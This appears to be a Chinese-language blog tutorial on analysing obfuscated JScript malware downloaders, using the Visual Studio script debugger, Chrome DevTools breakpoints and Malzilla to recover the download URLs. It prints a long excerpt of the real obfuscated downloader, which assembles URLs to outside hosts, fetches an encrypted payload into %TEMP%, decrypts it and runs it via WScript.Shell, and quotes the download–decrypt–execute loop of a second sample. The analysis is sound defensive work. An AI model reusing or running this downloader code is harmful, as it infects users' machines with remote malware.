此網站可以做一部分的網頁解密
網頁的初始解密部分不再詳細說明,在最後的附檔當中直接提供解密方法,但現在很多的即使網頁代碼已經是最終版,但其中增加很多函數等把病毒的下載地址都弄的很分散,從表面是看不出來從哪裡下載。
那直接執行又有風險,所以我們可以使用調試工具來分析,在關鍵位置下斷點,畢竟腳本還是要執行,那些變量最終還是要確實的變成實際的內容。
當然還是建議在虛擬機環境然後斷開網路的情況下做以下分析
在此提供兩種方法,第一種方法比較繁瑣需要安裝程式,第二種相對就簡單很多。
準備的程式為Visual Studio,我是用2008舉例,安裝的時候我是選擇下列組件,是不是還可以精簡就不知道了。
安裝完畢後,我們在CMD中執行
wscript /x 是調試模式
執行後就會調用VS進行調試
直接點“是”,會開啟VS
圖中黑色的部分是對腳本是選擇執行、暫停、停止
藍色的部分是腳本的代碼
紅色的部分是對應裡面的變量,因為目前都還沒有執行,所以對應的值還是不確定的,而我們恰恰就是要裡面最後的一些值
我們先截取一部分代碼,完整的代碼最後用附檔的方式提供
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 |
var ttends = "th"; var tdreed = "ng"; var trandom = "le"; var tflexwhitespace = "gth"; var tleppek = "len"; var tparticleradius = "xpeZz"; var tradtodeg = tparticleradius["" + "c" + "" + "h" + "ar" + "A" + "t"](2); var tm = "os"; var tcollisionend = "cl"; var tmsg = "le"; var tdoxie = "ToFi"; var smi = "Save"; var sothumbnailslist = "Text"; var sacross = "write"; var stends = "open"; var sdreed = "et"; var srandom = "ars"; var sflexwhitespace = "Ch"; var sm = "Je"; var sleppek = sm["" + "c" + "" + "h" + "ar" + "A" + "t"](1); var sradtodeg = "typ"; var scollisionend = "tream"; var sparticleradius = ".S"; var smsg = "ADODB"; var sdoxie = "ct"; var rmi = "eObje"; var rrenderer = "at"; var rhtc = "Cre"; var rothumbnailslist = "ose"; var racross = "cl"; var rdreed = "xt"; var rrandom = "Te"; var rflexwhitespace = "Read"; var rradtodeg = "ile"; var rm = "romF"; var rcollisionend = "LoadF"; var rparticleradius = "open"; function qmi(rdoxie) { return rdoxie; }; var qrenderer = "et"; var qhtc = "Chars"; var qothumbnailslist = "type"; var qacross = "am"; var qtends = "re"; var qdreed = "B.St"; var qrandom = "ADOD"; var qflexwhitespace = "ct"; var qleppek = "bje"; var qradtodeg = "teO"; var qm = "ea"; var qcollisionend = "Cr"; var qparticleradius = "th"; var qmsg = "leng"; function pothumbnailslist(phtc) { return phtc; }; function pmi(qdoxie) { return qdoxie; }; var ptends = "X1"; var pdreed = "fG"; var prandom = "vWpDX"; var pflexwhitespace = "JOi"; var pleppek = "XSqB"; var pradtodeg = "sdv"; var pm = "oFav"; var pcollisionend = "A6"; var pparticleradius = "XV5"; var pmsg = "gth"; var pdoxie = "len"; var ohtc = "7QPih"; var omi = ohtc["" + "c" + "" + "h" + "ar" + "A" + "t"](4); var orenderer = "lengt"; var otends = "0h"; var oothumbnailslist = otends["" + "c" + "" + "h" + "ar" + "A" + "t"](1); var oacross = "lengt"; var orandom = "ice"; var oflexwhitespace = "spl"; var oleppek = "gth"; var oradtodeg = "len"; var om = "th"; var ocollisionend = "leng"; var oparticleradius = "gth"; var omsg = "len"; var odoxie = "th"; var nmi = "leng"; var nrenderer = "eep"; var nhtc = "Sl"; var nacross = "Run"; var ntends = "ngth"; var ndreed = "le"; var nleppek = "hcs"; var nrandom = nleppek["" + "c" + "" + "h" + "ar" + "A" + "t"](0); var nflexwhitespace = "lengt"; var nradtodeg = "close"; var nm = "ile"; var ncollisionend = "veToF"; var nparticleradius = "Sa"; var mothumbnailslist = "DCIn"; var ndoxie = mothumbnailslist["" + "c" + "" + "h" + "ar" + "A" + "t"](3); var mmi = "io"; var mrenderer = "it"; var mhtc = "pos"; var mtends = "Body"; var mdreed = "se"; var mrandom = "spon"; var mflexwhitespace = "Re"; function mradtodeg(mleppek) { return mleppek; }; var mm = "ite"; var mcollisionend = "wr"; function mmsg(mparticleradius) { return mparticleradius; }; var mdoxie = "type"; var lmi = "open"; function lhtc(lrenderer) { return lrenderer; }; var lothumbnailslist = "eam"; var lacross = ".Str"; var ltends = "ADODB"; var ldreed = "ct"; var lrandom = "Obje"; var lflexwhitespace = "te"; var lleppek = "Crea"; var lradtodeg = "p"; var lm = "Slee"; var lcollisionend = "nd"; var lparticleradius = "se"; var krenderer = "5S6Mhv"; var lmsg = krenderer["" + "c" + "" + "h" + "ar" + "A" + "t"](4); var ldoxie = "ngt"; var kmi = "le"; var khtc = "GET"; function kdreed(ktends) { return ktends; }; var kflexwhitespace = "n"; var kleppek = "ope"; function jrenderer(jmi) { return jmi; }; function kdoxie(kmsg) { return kmsg; }; function kparticleradius(kcollisionend) { return kcollisionend; }; function km(kradtodeg) { return kradtodeg; }; var jhtc = "ep"; var jothumbnailslist = "Sle"; var jacross = "th"; var jtends = "leng"; var jdreed = "ct"; var jrandom = "eObje"; var jflexwhitespace = "Creat"; var jleppek = "th"; var jradtodeg = "leng"; function jcollisionend(jm) { return jm; }; var jmsg = "TP"; var jdoxie = "XMLHT"; var imi = "XML2."; var irenderer = "MS"; function iothumbnailslist(ihtc) { return ihtc; }; var idreed = ".1"; var irandom = "t.5"; var iflexwhitespace = "eques"; var ileppek = "ttpR"; var iradtodeg = "inH"; var im = "tp.W"; var icollisionend = "WinHt"; var iparticleradius = "xe"; var imsg = ".e"; function hrenderer(hmi) { return hmi; }; var hhtc = "FW"; var hothumbnailslist = "4B"; var hacross = "qBSfm"; var htends = "7Kr"; function hrandom(hdreed) { return hdreed; }; var hm = "C8il/XBT"; var hflexwhitespace = hm["" + "c" + "" + "h" + "ar" + "A" + "t"](4); var hleppek = "EMP%"; var hradtodeg = "%T"; function hparticleradius(hcollisionend) { return hcollisionend; }; var gacross = "DPoliCS"; var hdoxie = gacross["" + "c" + "" + "h" + "ar" + "A" + "t"](3); var gmi = ".Shel"; var grenderer = "pt"; var ghtc = "ri"; var gothumbnailslist = "WSc"; function gcollisionend(gm) { return gm; }; function gradtodeg(gleppek) { return gleppek; }; function gflexwhitespace(grandom) { return grandom; }; var gmsg = "ct"; var gdoxie = "je"; var fmi = "Ob"; var frenderer = "te"; var fhtc = "Crea"; var fothumbnailslist = "v83"; var facross = "odwh9"; var ftends = "78/"; var fdreed = "03."; var fflexwhitespace = "1"; var fleppek = "1."; var fradtodeg = ".1"; var fm = "://52"; var fcollisionend = "http"; function fmsg(fparticleradius) { return fparticleradius; }; var erenderer = "pfmKc"; var fdoxie = erenderer["" + "c" + "" + "h" + "ar" + "A" + "t"](2); var emi = "1x"; var ehtc = "/15"; var eothumbnailslist = "org"; var eacross = "."; var etends = "-ccd"; function erandom(edreed) { return edreed; }; var eflexwhitespace = "cdc"; var eleppek = "w."; var eradtodeg = "w"; var em = "//w"; var ecollisionend = "tp:"; var eparticleradius = "ht"; var edoxie = "38p9gC"; var emsg = edoxie["" + "c" + "" + "h" + "ar" + "A" + "t"](4); var dhtc = "ymqEu"; var dmi = dhtc["" + "c" + "" + "h" + "ar" + "A" + "t"](1); var drenderer = "210l"; var dothumbnailslist = "s/69"; var dtends = ".e"; var drandom = "ght"; var dflexwhitespace = "ytoni"; function dradtodeg(dleppek) { return dleppek; }; var dm = ".cit"; var dcollisionend = "www"; var dmsg = "p://"; var ddoxie = "htt"; var cmi = "437"; function brenderer(bmi) { return bmi; }; function cdoxie(cmsg) { return cmsg; }; function cparticleradius(ccollisionend) { return ccollisionend; }; function cm(cradtodeg) { return cradtodeg; }; function cleppek(cflexwhitespace) { return cflexwhitespace; }; function cacross(cothumbnailslist) { return cothumbnailslist; }; function chtc(crenderer) { return crenderer; }; var bhtc = "th"; var bothumbnailslist = "ng"; var bacross = "le"; var btends = "AAAA"; var bdreed = "AAA"; var brandom = "AAAAI"; var bflexwhitespace = "AAA"; var bleppek = "AA"; var bradtodeg = "AAAAAAAAAIAAAAAAA"; var aparticleradius /* OMq Imf xFk */ = bradtodeg[brenderer(bacross) + bothumbnailslist + bhtc]; var dreed = 1; var ahtc = 2; var adreed = 2; var bm = "437"; var arenderer = [ddoxie + (function dparticleradius() { return dmsg; }()) + dcollisionend + dradtodeg(dm) + dflexwhitespace + (function ddreed() { return drandom; }()) + dtends + dothumbnailslist + drenderer + dmi + emsg, eparticleradius + ecollisionend + em + eradtodeg + eleppek + erandom(eflexwhitespace) + etends + eacross + eothumbnailslist + ehtc + fmsg(emi) + fdoxie, fcollisionend + fm + fradtodeg + fleppek + (function frandom() { return fflexwhitespace; }()) + fdreed + ftends + facross + fothumbnailslist]; var bcollisionend = WScript[fhtc + (function gparticleradius() { return frenderer; }()) + gcollisionend(fmi) + gdoxie + gmsg](gothumbnailslist + ghtc + grenderer + (function hmsg() { return gmi; }()) + hparticleradius(hdoxie)); var random = bcollisionend.ExpandEnvironmentStrings(hrandom(hradtodeg) + hleppek + hflexwhitespace); var adoxie = random + hrenderer(htends) + hacross + (function idoxie() { return hothumbnailslist; }()) + hhtc; var arandom = adoxie + (function dacross() { return dtends; }()) + iparticleradius; var across = [icollisionend + (function itends() { return im; }()) + (function iacross() { return iradtodeg; }()) + ileppek + iothumbnailslist(iflexwhitespace) + irandom + idreed, (function jparticleradius() { return irenderer; }()) + jcollisionend(imi) + jdoxie + jmsg]; |
前面裡面可以找到一些類似是網址的一部分變量,用這些變量搜索會出現在後面的哪個位置,因為在後面肯定是要組合成一個完整的網址,從代碼中大概可以知道,是在下面這段
1234567 var arenderer = [ddoxie + (function dparticleradius() {return dmsg;}()) + dcollisionend + dradtodeg(dm) + dflexwhitespace + (function ddreed() {return drandom;}()) + dtends + dothumbnailslist + drenderer + dmi + emsg, eparticleradius + ecollisionend + em + eradtodeg + eleppek + erandom(eflexwhitespace) + etends + eacross + eothumbnailslist + ehtc + fmsg(emi) + fdoxie, fcollisionend + fm + fradtodeg + fleppek + (function frandom() {return fflexwhitespace;}()) + fdreed + ftends + facross + fothumbnailslist];
那我們就在這段的後面下斷點
下斷點後就會顯示下面的樣子,同時也可以看到arenderer的內容目前也是不知道的
現在我們按綠色箭頭開始執行,然後就馬上會在我們下斷點的bcollisionend的地方停止下來,而arenderer的指也已經顯示出來了
就是我們需要的JS腳本會去下載的鏈接,此例子當中是3個地址
當然如果你確定是在哪裡下斷點又不會讓病毒下載下來執行,就可以稍微後面一點下斷點,就可以獲取到更多的一些資訊了,比如下載下來的文件放在本機的位置及名字等等。
上面這個是一種方法,其實還有更簡單的方法,就是使用瀏覽器的開發人員工具,在chrome和firefox來說都是按F12,因為這個是針對當前頁面調試了,所以在就不建議整個去執行,這樣就變激活了(當然還是建議在斷開網路的情況下執行),我們就只截取一段,比方上述arenderer的結尾,後面的部分全部砍掉,這樣即使可以執行也不會有安全的風險,前面後面加<script>及</script>,然後保存為htm的網頁文件,打開chrome,按F12,然後把這個 網頁拖到chrome裡,點擊sources,然後點左下角你剛才開啟對網頁文件,代碼的部分就會顯示在中間,因為我需要了解arenderer的值而已,所以定位到arenderer後,右鍵選擇”Add to watch”,然後就可以從右邊看到此項的值了,非常的快速簡單。
最後附對應的原始病毒js檔及對應的解密方法,解壓縮密碼為infected
如果是使用malzilla解密,則可以參考下面方式,首先需要把前面的/*@cc_on和@*/刪除,然後把代碼粘貼到程式當中,因為是eval的,所以我們在replace eval()後填寫eval,然後執行run script,下面就會顯示出來解密的代碼了。
有了代碼,但因為裏面還有很多\x這樣16進制的內容,所以我再貼到misc decoders 的text當中,下面自訂前綴為 \x ,然後點decode Hex,上面顯示的就是最終的解密內容了。
上述的js找Http下載下來的文件是病毒本體嗎?其實不是,是下載的經過加密後的執行檔,js把文件下載後,會調用後半段的函數講下載的文件解密成執行檔,然後再執行,所以要么你能看懂裡面的解密函數自行解密,要么就是直接在虛擬機裡執行腳本,當然因為其行為就是 下載——解密——執行,我們可以把執行的代碼部分刪除掉
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
var bdoxie = msg /* OMq Imf xFk */ (adoxie); bdoxie = doxie(bdoxie); if (bdoxie[bacross + bothumbnailslist + cm(bhtc)] < 170 * 1024 || bdoxie[bacross + bothumbnailslist + bhtc] > (35 * 5 + 10) * 1024 || !radtodeg(bdoxie)) { amsg = 1; continue; } try { particleradius(arandom, bdoxie); } catch (e) { break; }; bcollisionend[(function nothumbnailslist() { return nacross; }())](arandom); break; } catch (e) { WScript[jothumbnailslist + km(jhtc)](3856 - 2856); continue; }; } while (amsg); WScript.Quit(0); |
是不是刪除的正確,不確定,因為原始地址已經失效了,其中的
1 |
WScript[jothumbnailslist + km(jhtc)](3856 - 2856); |
是WScript.Sleep(1000),後面就是結束退出
前面的
1 |
particleradius(arandom, bdoxie); |
是調用解密函數解密文件,所以下面的
1 2 3 |
bcollisionend[(function nothumbnailslist() { return nacross; }())](arandom); |
應該就是執行文件了,並且其中的nacross在前面的值也剛好是run.
我們看另外一個案例
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
var cccccc = a(____ /* Nyq uNb wgE */); cccccc = _(cccccc); if (cccccc.length < 120 * 1024 || cccccc.length > 160 * 1024 || !__(cccccc)) { aaaa = 1; continue; } try { b(aaaaa, cccccc); } catch (e) {break;}; aaaaaaa.Run(aaaaa); break; } catch (e) {WScript.Sleep(1000); continue;}; } while (aaaa); WScript.Quit(0); |
這個就很明顯,就是aaaaaaa.Run(aaaaa);來執行檔案,b(aaaaa, cccccc);負責解密下載的文件。
此例的js及說明參考下面附檔,密碼是infected